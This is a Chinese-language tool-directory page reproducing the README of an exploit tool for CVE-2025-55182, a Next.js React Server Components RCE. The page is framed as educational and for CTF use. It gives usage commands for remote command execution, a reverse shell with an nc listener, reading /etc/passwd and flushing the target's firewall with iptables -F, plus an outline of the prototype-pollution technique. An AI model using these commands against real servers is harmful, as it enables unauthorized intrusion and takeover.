Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WEB-CLI_RCE_React2Shell — WEB-CLI_RCE_React2Shell 是一个针对 CVE-2025-55182 的教育性 PoC 漏洞利用工具,该漏洞是使用 React Server Components 的 Next.js 应用程序中的一个严重原型污染缺陷。它专为 CTF 和研究而设计,具有单命令模式、交互式 Web CLI 和反向 Shell 功能,用于演示 RCE。 | Kitploit
工具/GitHubGitHub/raivenlockdown/web-cli_rce_react2shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育远程访问工具
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
raivenlockdown/web-cli_rce_react2shell

WEB-CLI_RCE_React2Shell

WEB-CLI_RCE_React2Shell 是一个针对 CVE-2025-55182 的教育性 PoC 漏洞利用工具,该漏洞是使用 React Server Components 的 Next.js 应用程序中的一个严重原型污染缺陷。它专为 CTF 和研究而设计,具有单命令模式、交互式 Web CLI 和反向 Shell 功能,用于演示 RCE。

查看仓库
53个月前尚未审核

REACT2SHELL

🎯 快速概览(这是什么?)

该工具是一个针对 CVE-2025-55182 的简单概念验证(PoC)漏洞利用程序。这是在使用了 React Server Components 的 Next.js 应用中发现的一个严重缺陷(原型污染)。

如果目标服务器存在漏洞,该脚本可让你在服务器上执行操作系统命令(远程代码执行,即 RCE)。

该工具专为学习、CTF 比赛和负责任的安全研究而构建。

Screenshot 2025-12-12 214115

⚠️ 学生与 CTF 玩家免责声明

请合乎道德地使用。 仅可针对你拥有或已获得明确书面测试许可的系统运行此漏洞利用程序。未经授权的使用属于违法行为。此工具仅供教育目的使用。

🌟 如何使用

该工具有三种主要的命令运行方式:简单的单条命令、完整的交互式 Web 控制台,以及经典反弹 Shell 的尝试。

⚙️ 安装

  1. 获取代码:

    root@kitploit:~
    git clone https://github.com/raivenLockdown/WEB-CLI_RCE_React2Shell.git
    cd REACT2SHELL
    
  2. 安装依赖库:

    root@kitploit:~
    pip install requests
    

模式 1:交互式 Web 控制台(CTF 推荐)

这是与目标交互最简单的方式。它会在你的机器上启动一个类似终端的本地网页。

  1. 运行脚本:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> --web-cli
    

    示例: python3 exploit.py http://target.com/ --web-cli

  2. 打开浏览器: 脚本会提示你打开 http://127.0.0.1:8000/。然后你就可以直接在网页中输入命令(如 ls、whoami、cat /etc/passwd)。

模式 2:单条命令执行

运行单条命令并立即在本地终端中获取输出。适合快速检查,如查看你的用户 ID。

root@kitploit:~
python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

示例: python3 exploit.py http://target.com/ --cmd 'id'

模式 3:反弹 Shell 尝试

如果你想要一个稳定、持久的连接,可使用此模式。注意: 由于防火墙(出站过滤)的存在,这在真实环境中经常失败。

  1. 启动你的监听器(例如 netcat):

    root@kitploit:~
    nc -lvnp 55555
    
  2. 运行漏洞利用程序:

    root@kitploit:~
    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    
    • -i <YOUR_IP>:你机器的 IP。
    • -p 55555:你的监听器所使用的端口。
    • --flush(可选):会先尝试在目标上运行 iptables -F 以清除主机防火墙。

🔬 技术解析(漏洞利用原理)

此漏洞利用程序通过 原型污染 缺陷实现 RCE。

  1. 原型污染: 脚本向存在漏洞的 Next.js 端点发送特制的 payload。该 payload 利用服务器处理数据方式中的缺陷,使我们能够向 JavaScript 的基础对象结构(Object.prototype)添加属性。
  2. RCE 触发: 我们污染一个控制服务器运行代码的内部特定属性(使用 Node.js 的 child_process)。我们将该属性的值替换为我们的 shell 命令。
  3. 输出捕获: 在单条命令或 Web CLI 模式下运行命令时,漏洞利用程序会让服务器执行命令(execSync)并立即抛出一个无害的错误。命令输出被巧妙地塞入错误消息的 digest 字段中。随后 Python 脚本读取该字段以获取结果。

🤝 参考资料与致谢

本研究依赖于安全社区的初期工作与披露。感谢所有研究人员和开源贡献者。

📚 主要参考资料

  • CVE-2025-55182 原始 PoC 仓库 - (本漏洞利用程序的基础。)
  • 原始 PoC 代码示例 - (初始代码示例。)
  • React Server Components 中的严重安全漏洞 - (React 官方博客针对该问题的文章。)
  • React 中的严重漏洞(CVE-2025-55182) - (详细的安全分析。)
  • React Server Functions 文档 - (官方文档,解释易受攻击组件的运行上下文。)
下载工具